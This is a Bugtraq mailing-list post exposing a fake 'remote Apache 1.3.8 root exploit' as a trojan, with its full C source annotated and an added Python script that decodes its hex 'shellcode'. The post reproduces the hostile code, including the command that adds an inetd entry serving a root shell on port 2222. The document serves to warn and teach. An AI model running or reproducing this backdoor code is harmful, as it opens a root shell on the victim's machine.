Bugtraq mailing list archives
don't run random "exploit" code
From: marcs () ZNEP COM (Marc Slemko)
Date: Tue, 8 Feb 2000 14:55:48 -0700
Below is some code that I have seen a number of times, with some very slight variations, over the past few months. I have no idea how many people have been tricked by it.

This does not exploit any hole in Apache, period. As a simple inspection shows you, it will run:

    echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h

on the local machine. If you try this "exploit" as root, it will certainly try to compromise your machine. But not remotely, and it has nothing to do with Apache or any bug other than the "bug" of admins running random code as root.

I know this should be too obvious to have to say and should be no news to anyone here, but: do not run random supposed exploits as root on your box without knowing what they do. Do not even run them as a non-root UID unless it is a throwaway UID (better yet, a throwaway box) and you have examined what the program does. This obviously applies to things posted to bugtraq but, even more so, to "secret" exploits you may find or be sent.

Again: the below code has nothing to do with any supposed security hole in Apache. To top it all off, in this case there is the fact that there was never an Apache 1.3.8 released to exploit. Apache went from 1.3.6 to 1.3.9.

I am posting this to chop off any rumors of a "secret" Apache root exploit at the knees, as well as to give people an example of why they shouldn't do silly things.

Thanks.
/* remote apache 1.3.8 root exploit (linux) */
/* Trojaned "exploit" as circulated; shown as posted, with comments added
 * explaining what it really does. */
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Not machine code: these bytes are plain ASCII for
 *   echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h
 * i.e. an inetd entry that serves a root shell on port 2222, started on the
 * machine running this program. */
char shellcode[] = \
"\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"
"\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"
"\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"
"\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"
"\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68";

/* NOP, OFFSET and ADDR are never used: exploit-looking window dressing. */
#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000

int main(int argc, char *argv[])
{
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;

    if (argc != 2) {
        printf("%s <target>\n", argv[0]);
        exit(1);
    }
    buffer = (char *) malloc(BSIZE + ASIZE + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    /* The buffer is never filled with NOPs or a return address; what gets
     * sent to the "target" is mostly uninitialised malloc() memory. */
    memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
    buffer[BSIZE + ASIZE] = ';';
    buffer[BSIZE + ASIZE + 1] = '\0';
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("no such server\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Can't open socket\n");
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused\n");
        exit(1);
    }
    printf("sending exploit code...\n");
    /* send() returns the number of bytes written, which is never 1 here,
     * so this branch always claims success whatever the server did. */
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("exploit was successful!\n");
    else
        printf("sorry, this site isn't vulnerable\n");
    printf("waiting for shell.....\n");
    /* The real action: the "shellcode" string is handed to /bin/sh -c on the
     * LOCAL machine, with the privileges of whoever ran this program. */
    if (fork() == 0)
        execl("/bin/sh", "sh", "-c", shellcode, 0);
    else
        wait(NULL);
    while (1) { /* shell */ }
}

--
Marc Slemko | Apache Software Foundation member
marcs () znep com | marc () apache org
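The inspection Marc describes, as an added example that is not part of the original post: decode the C hex "shellcode" literal and show that it is printable ASCII text writing an inetd entry for a root shell on port 2222, rather than machine code. The hex literal is copied from the post; the function names and the inetd field parser are my own.

```python
import re
import string

# The "shellcode" literal exactly as it appears in the trojaned "exploit"
# quoted in the post (C string concatenation reproduced verbatim).
TROJAN_SHELLCODE = (
    r'"\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"'
    r'"\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"'
    r'"\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"'
    r'"\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"'
    r'"\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"'
    r'"\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68"'
)

def decode_c_hex_literal(literal: str) -> bytes:
    """Decode concatenated C string literals made of \\xNN escapes into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))

def is_printable_ascii(payload: bytes) -> bool:
    """Real machine code is never all printable text; a 'shellcode' that is
    entirely printable is a command string in disguise."""
    return payload.isascii() and all(chr(b) in string.printable for b in payload)

def parse_inetd_line(line: str) -> dict:
    """Split an inetd.conf entry: service type proto wait user program args."""
    fields = line.split()
    return {"port": fields[0], "socket": fields[1], "proto": fields[2],
            "wait": fields[3], "user": fields[4], "program": fields[5],
            "args": fields[6:]}

def triage(literal: str) -> dict:
    """Decode the payload and, if it is text, pull out the inetd entry it writes."""
    payload = decode_c_hex_literal(literal)
    result = {"length": len(payload), "printable": is_printable_ascii(payload),
              "command": None, "inetd_entry": None}
    if not result["printable"]:
        return result
    command = payload.decode("ascii")
    result["command"] = command
    # echo "<entry>">> file ; ...   -> the quoted part is the inetd.conf line
    m = re.search(r'echo\s+"([^"]*)"\s*>>', command)
    if m:
        result["inetd_entry"] = parse_inetd_line(m.group(1))
    return result

if __name__ == "__main__":
    print(triage(TROJAN_SHELLCODE))
```

Running it prints the decoded command and an entry with user root, program /bin/sh and port 2222, which is all one needs to know before deciding never to execute the sample.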